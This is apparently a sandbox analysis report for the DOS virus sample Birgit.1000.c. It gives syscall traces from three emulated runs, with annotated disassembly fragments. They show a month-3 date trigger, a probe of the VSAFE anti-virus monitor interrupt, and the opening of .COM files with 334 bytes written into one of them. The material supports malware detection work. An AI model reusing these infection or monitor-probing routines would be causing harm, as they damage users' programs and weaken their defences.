Sample viewer

vx.netlux.org/Virus.DOS.Birgit.1000.c


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:03:54.370058917Z 250 PC: 12c0e | UNKNOWN!
2018-12-17T22:03:54.371421494Z 42 PC: 12bfd | Get date 0x12bfd: cmp dh, 3
; Disassembly window for the code that runs once the Get date call returns at
; PC 12bfd; its first instruction (cmp dh, 3) sits on the trace row above.
; INT 21h AH=2Ah hands back the month in DH, so that compare is a date trigger.
; In this run the next trace row is Get current directory at PC 12c26, i.e. the
; jne below was taken and the month-3 path was skipped.
0x12c00: jne 0x12c0f                                    ; month != 3: skip to the search setup at 0x12c0f
0x12c02: int 5                                          ; month == 3 only: INT 05h is the BIOS print-screen interrupt
0x12c04: push 0xfa02
0x12c07: pop ax                                         ; AX = 0xFA02, so AH = 0xFA (250): the trace's syscall 250 "UNKNOWN!"
0x12c08: push 0x5945
0x12c0b: pop dx                                         ; DX = 0x5945
0x12c0c: int 0x21                                       ; NOTE(review): AX=FA02h with DX=5945h matches the VSAFE/VWATCH resident-monitor API (get/set options) - confirm against an interrupt reference; a sample probing a resident AV monitor is worth a detection
0x12c0e: ret                                            ; trace rows with PC 12c0e are the return address of the int 0x21 above
0x12c0f: cld                                            ; forward direction for the string copy below
0x12c10: mov cx, 4                                      ; copy length: 4 bytes
0x12c13: mov di, 0x100                                  ; destination offset 0x100, where DOS loads a .COM image
0x12c16: lea si, word ptr [bp + 0x360]                  ; source offset BP+0x360
0x12c1a: rep movsb byte ptr es:[di], byte ptr [si]      ; presumably puts the host program's saved first 4 bytes back - TODO confirm
0x12c1c: mov ah, 0x47                                   ; INT 21h AH=47h: get current directory (trace syscall 71)
0x12c1e: mov dl, 0                                      ; DL = 0 selects the default drive
0x12c20: lea si, word ptr [bp + 0x3ea]                  ; DS:SI = buffer that receives the path
0x12c24: int 0x21
0x12c26: mov ah, 0x4e                                   ; INT 21h AH=4Eh: find first file (trace syscall 78)
0x12c28: lea dx, word ptr [bp + 0x3e0]                  ; DS:DX = search pattern; the int 0x21 itself (trace PC 12c31) lies past the end of this window
2018-12-17T22:03:54.373960145Z 71 PC: 12c26 | Get current directory
2018-12-17T22:03:54.376636369Z 78 PC: 12c31 | Find first file
2018-12-17T22:03:54.382872582Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.385494611Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.388013956Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.391182118Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.393890881Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.396393352Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.399309708Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.402514184Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.404835373Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.406261897Z 59 PC: 12c8c | Change current directory
2018-12-17T22:03:54.409284336Z 59 PC: 12cc6 | Change current directory
2018-12-17T22:03:54.413699442Z 250 PC: 12c0e | UNKNOWN!
2018-12-17T22:03:54.415301626Z 44 PC: 12ac1 | Get time 0x12ac1: cmp word ptr [si + 0x11b], 0
; Disassembly window for the code that runs once the Get time call returns at
; PC 12ac1; its first instruction (cmp word ptr [si + 0x11b], 0) sits on the
; trace row above. INT 21h AH=2Ch hands back seconds in DH and hundredths in DL.
0x12ac6: je 0x12ad4                                     ; stored word at SI+0x11b is zero: go and store a fresh time value
0x12ac8: cmp word ptr [si + 0x11c], 0                   ; overlapping word one byte further on
0x12acd: je 0x12ad4
0x12acf: cmp dh, 0xf                                    ; seconds compared with 15
0x12ad2: jle 0x12ae2                                    ; signed <= 15: keep the stored value and start the file search
0x12ad4: cmp dl, 0
0x12ad7: je 0x12abd                                     ; hundredths == 0: branch back to 0x12abd (outside this window; presumably re-reads the time)
0x12ad9: cmp dh, 0
0x12adc: je 0x12abd                                     ; seconds == 0: same branch
0x12ade: mov word ptr [si + 0x11b], dx                  ; save seconds:hundredths; NOTE(review): looks like a time-derived seed or key - confirm
0x12ae2: mov bp, word ptr [si + 0x245]
0x12ae6: add bp, 0x103                                  ; BP = stored word + 0x103; its use is not visible in this window
0x12aea: lea dx, word ptr [si + 0x247]                  ; DS:DX = search pattern for find first
0x12aee: sub cx, cx                                     ; CX = 0: attribute mask 0 (normal files)
0x12af0: mov ah, 0x4e                                   ; INT 21h AH=4Eh: find first file (trace syscall 78)
0x12af2: int 0x21
0x12af4: jb 0x12b72                                     ; carry set (no match or error): branch to 0x12b72, outside this window
0x12af6: mov dx, 0x9e                                   ; DS:DX = 0x9E, the file-name field of the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12af9: mov ax, 0x3d02                                 ; AH=3Dh open, AL=02h read/write; the trace rows that follow show each matched .COM file opened this way (return PC 12afe)
2018-12-17T22:03:54.418212502Z 78 PC: 12af4 | Find first file
2018-12-17T22:03:54.429620809Z 61 PC: 12afe | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:03:54.435931989Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:54.443751282Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.44646857Z 61 PC: 12afe | Open file (Filename = 'PRINT.COM')
2018-12-17T22:03:54.452769802Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:03:54.460110888Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.46276428Z 61 PC: 12afe | Open file (Filename = 'HELLO.COM')
2018-12-17T22:03:54.469158695Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 7)
2018-12-17T22:03:54.4760437Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.478593088Z 61 PC: 12afe | Open file (Filename = 'PHANG.COM')
2018-12-17T22:03:54.485182502Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 8)
2018-12-17T22:03:54.491478565Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.503385669Z 61 PC: 12afe | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:03:54.509688112Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 9)
2018-12-17T22:03:54.515735416Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.518804243Z 61 PC: 12afe | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:03:54.525039267Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 10)
2018-12-17T22:03:54.531185297Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.534207089Z 61 PC: 12afe | Open file (Filename = 'PAH.COM')
2018-12-17T22:03:54.54042648Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 11)
2018-12-17T22:03:54.546538547Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.549632125Z 61 PC: 12afe | Open file (Filename = 'TEST.COM')
2018-12-17T22:03:54.556085377Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 12)
2018-12-17T22:03:54.562076979Z 66 PC: 12b7b | Move file pointer
2018-12-17T22:03:54.564475468Z 63 PC: 12b7b | Read file or device (Read 2 bytes on handle 12)
2018-12-17T22:03:54.566973257Z 66 PC: 12b7b | Move file pointer
2018-12-17T22:03:54.568538399Z 64 PC: 12ab9 | Write file or device (Write 334 bytes on handle 12)
2018-12-17T22:03:54.583652974Z 66 PC: 12b7b | Move file pointer
2018-12-17T22:03:54.584924512Z 64 PC: 12b7b | Write file or device (Write 2 bytes on handle 12)
2018-12-17T22:03:54.587674794Z 62 PC: 12b7b | Close file
2018-12-17T22:03:54.595938688Z 76 PC: 12a57 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1556,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:55.073508774Z 250 PC: 12c0e | UNKNOWN!
2018-12-25T11:43:55.075260512Z 42 PC: 12bfd | Get date 0x12bfd: cmp dh, 3
; Disassembly window for the code that runs once the Get date call returns at
; PC 12bfd; its first instruction (cmp dh, 3) sits on the trace row above.
; INT 21h AH=2Ah hands back the month in DH, so that compare is a date trigger.
; In this run the next trace row is Get current directory at PC 12c26, i.e. the
; jne below was taken and the month-3 path was skipped.
0x12c00: jne 0x12c0f                                    ; month != 3: skip to the search setup at 0x12c0f
0x12c02: int 5                                          ; month == 3 only: INT 05h is the BIOS print-screen interrupt
0x12c04: push 0xfa02
0x12c07: pop ax                                         ; AX = 0xFA02, so AH = 0xFA (250): the trace's syscall 250 "UNKNOWN!"
0x12c08: push 0x5945
0x12c0b: pop dx                                         ; DX = 0x5945
0x12c0c: int 0x21                                       ; NOTE(review): AX=FA02h with DX=5945h matches the VSAFE/VWATCH resident-monitor API (get/set options) - confirm against an interrupt reference; a sample probing a resident AV monitor is worth a detection
0x12c0e: ret                                            ; trace rows with PC 12c0e are the return address of the int 0x21 above
0x12c0f: cld                                            ; forward direction for the string copy below
0x12c10: mov cx, 4                                      ; copy length: 4 bytes
0x12c13: mov di, 0x100                                  ; destination offset 0x100, where DOS loads a .COM image
0x12c16: lea si, word ptr [bp + 0x360]                  ; source offset BP+0x360
0x12c1a: rep movsb byte ptr es:[di], byte ptr [si]      ; presumably puts the host program's saved first 4 bytes back - TODO confirm
0x12c1c: mov ah, 0x47                                   ; INT 21h AH=47h: get current directory (trace syscall 71)
0x12c1e: mov dl, 0                                      ; DL = 0 selects the default drive
0x12c20: lea si, word ptr [bp + 0x3ea]                  ; DS:SI = buffer that receives the path
0x12c24: int 0x21
0x12c26: mov ah, 0x4e                                   ; INT 21h AH=4Eh: find first file (trace syscall 78)
0x12c28: lea dx, word ptr [bp + 0x3e0]                  ; DS:DX = search pattern; the int 0x21 itself (trace PC 12c31) lies past the end of this window
2018-12-25T11:43:55.077221831Z 71 PC: 12c26 | Get current directory
2018-12-25T11:43:55.079695823Z 78 PC: 12c31 | Find first file
2018-12-25T11:43:55.08529988Z 79 PC: 12ca0 | Find next file
2018-12-25T11:43:55.088236973Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.091567219Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.094823805Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.106811446Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.109784521Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.112776249Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.116235963Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.11868092Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.120934715Z 59 PC: 12c8c | Change current directory
2018-12-25T11:43:55.130753015Z 59 PC: 12cc6 | Change current directory
2018-12-25T11:43:55.134831231Z 250 PC: 12c0e | UNKNOWN! (See above)
2018-12-25T11:43:55.136297638Z 44 PC: 12ac1 | Get time 0x12ac1: cmp word ptr [si + 0x11b], 0
; Disassembly window for the code that runs once the Get time call returns at
; PC 12ac1; its first instruction (cmp word ptr [si + 0x11b], 0) sits on the
; trace row above. INT 21h AH=2Ch hands back seconds in DH and hundredths in DL.
0x12ac6: je 0x12ad4                                     ; stored word at SI+0x11b is zero: go and store a fresh time value
0x12ac8: cmp word ptr [si + 0x11c], 0                   ; overlapping word one byte further on
0x12acd: je 0x12ad4
0x12acf: cmp dh, 0xf                                    ; seconds compared with 15
0x12ad2: jle 0x12ae2                                    ; signed <= 15: keep the stored value and start the file search
0x12ad4: cmp dl, 0
0x12ad7: je 0x12abd                                     ; hundredths == 0: branch back to 0x12abd (outside this window; presumably re-reads the time)
0x12ad9: cmp dh, 0
0x12adc: je 0x12abd                                     ; seconds == 0: same branch
0x12ade: mov word ptr [si + 0x11b], dx                  ; save seconds:hundredths; NOTE(review): looks like a time-derived seed or key - confirm
0x12ae2: mov bp, word ptr [si + 0x245]
0x12ae6: add bp, 0x103                                  ; BP = stored word + 0x103; its use is not visible in this window
0x12aea: lea dx, word ptr [si + 0x247]                  ; DS:DX = search pattern for find first
0x12aee: sub cx, cx                                     ; CX = 0: attribute mask 0 (normal files)
0x12af0: mov ah, 0x4e                                   ; INT 21h AH=4Eh: find first file (trace syscall 78)
0x12af2: int 0x21
0x12af4: jb 0x12b72                                     ; carry set (no match or error): branch to 0x12b72, outside this window
0x12af6: mov dx, 0x9e                                   ; DS:DX = 0x9E, the file-name field of the default DTA (0x80 + 0x1E), assuming the DTA was not moved
0x12af9: mov ax, 0x3d02                                 ; AH=3Dh open, AL=02h read/write; the trace rows that follow show each matched .COM file opened this way (return PC 12afe)
2018-12-25T11:43:55.139084595Z 78 PC: 12af4 | Find first file
2018-12-25T11:43:55.147870087Z 61 PC: 12afe | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:55.154270362Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:55.161044366Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.16417589Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.170536686Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.176903673Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.180076377Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.196791932Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.203153541Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.207015543Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.213697012Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.219923448Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.223140959Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.229515414Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.235866536Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.239285231Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.245560392Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.252079686Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.255181521Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.261393892Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.267456226Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.270164234Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.27685726Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.282860378Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T11:43:55.284132582Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.286920141Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T11:43:55.288169311Z 64 PC: 12ab9 | Write file or device (Write 334 bytes on handle 12)
2018-12-25T11:43:55.301090876Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T11:43:55.3029025Z 64 PC: 12b7b | Write file or device (See above)
2018-12-25T11:43:55.305618832Z 62 PC: 12b7b | Close file (See above)
2018-12-25T11:43:55.313589323Z 76 PC: 12a57 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1556,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:55.395105429Z 250 PC: 12c0e | UNKNOWN!
2018-12-25T11:43:55.396461022Z 42 PC: 12bfd | Get date 0x12bfd: cmp dh, 3
; Disassembly window for the code that runs once the Get date call returns at
; PC 12bfd; its first instruction (cmp dh, 3) sits on the trace row above.
; INT 21h AH=2Ah hands back the month in DH, so that compare is a date trigger.
; NOTE(review): in this run the trace rows after the window go straight to
; syscall 250 at PC 12c0e with no directory or file calls, which is consistent
; with the not-taken path (DH == 3); presumably the emulated date for this run
; was set to March - confirm against the run's configuration record.
0x12c00: jne 0x12c0f                                    ; month != 3: skip to the search setup at 0x12c0f
0x12c02: int 5                                          ; month == 3 only: INT 05h is the BIOS print-screen interrupt
0x12c04: push 0xfa02
0x12c07: pop ax                                         ; AX = 0xFA02, so AH = 0xFA (250): the trace's syscall 250 "UNKNOWN!"
0x12c08: push 0x5945
0x12c0b: pop dx                                         ; DX = 0x5945
0x12c0c: int 0x21                                       ; NOTE(review): AX=FA02h with DX=5945h matches the VSAFE/VWATCH resident-monitor API (get/set options) - confirm against an interrupt reference; a sample probing a resident AV monitor is worth a detection
0x12c0e: ret                                            ; trace rows with PC 12c0e are the return address of the int 0x21 above
0x12c0f: cld                                            ; forward direction for the string copy below
0x12c10: mov cx, 4                                      ; copy length: 4 bytes
0x12c13: mov di, 0x100                                  ; destination offset 0x100, where DOS loads a .COM image
0x12c16: lea si, word ptr [bp + 0x360]                  ; source offset BP+0x360
0x12c1a: rep movsb byte ptr es:[di], byte ptr [si]      ; presumably puts the host program's saved first 4 bytes back - TODO confirm
0x12c1c: mov ah, 0x47                                   ; INT 21h AH=47h: get current directory
0x12c1e: mov dl, 0                                      ; DL = 0 selects the default drive
0x12c20: lea si, word ptr [bp + 0x3ea]                  ; DS:SI = buffer that receives the path
0x12c24: int 0x21
0x12c26: mov ah, 0x4e                                   ; INT 21h AH=4Eh: find first file
0x12c28: lea dx, word ptr [bp + 0x3e0]                  ; DS:DX = search pattern; the int 0x21 that would use it lies past the end of this window
2018-12-25T11:43:55.399267446Z 250 PC: 12c0e | UNKNOWN! (See above)
2018-12-25T11:43:55.400103796Z 250 PC: 12c0e | UNKNOWN! (See above)
2018-12-25T11:43:55.401447539Z 42 PC: 12bfd | Get date (See above)
2018-12-25T11:43:55.404439736Z 250 PC: 12c0e | UNKNOWN! (See above)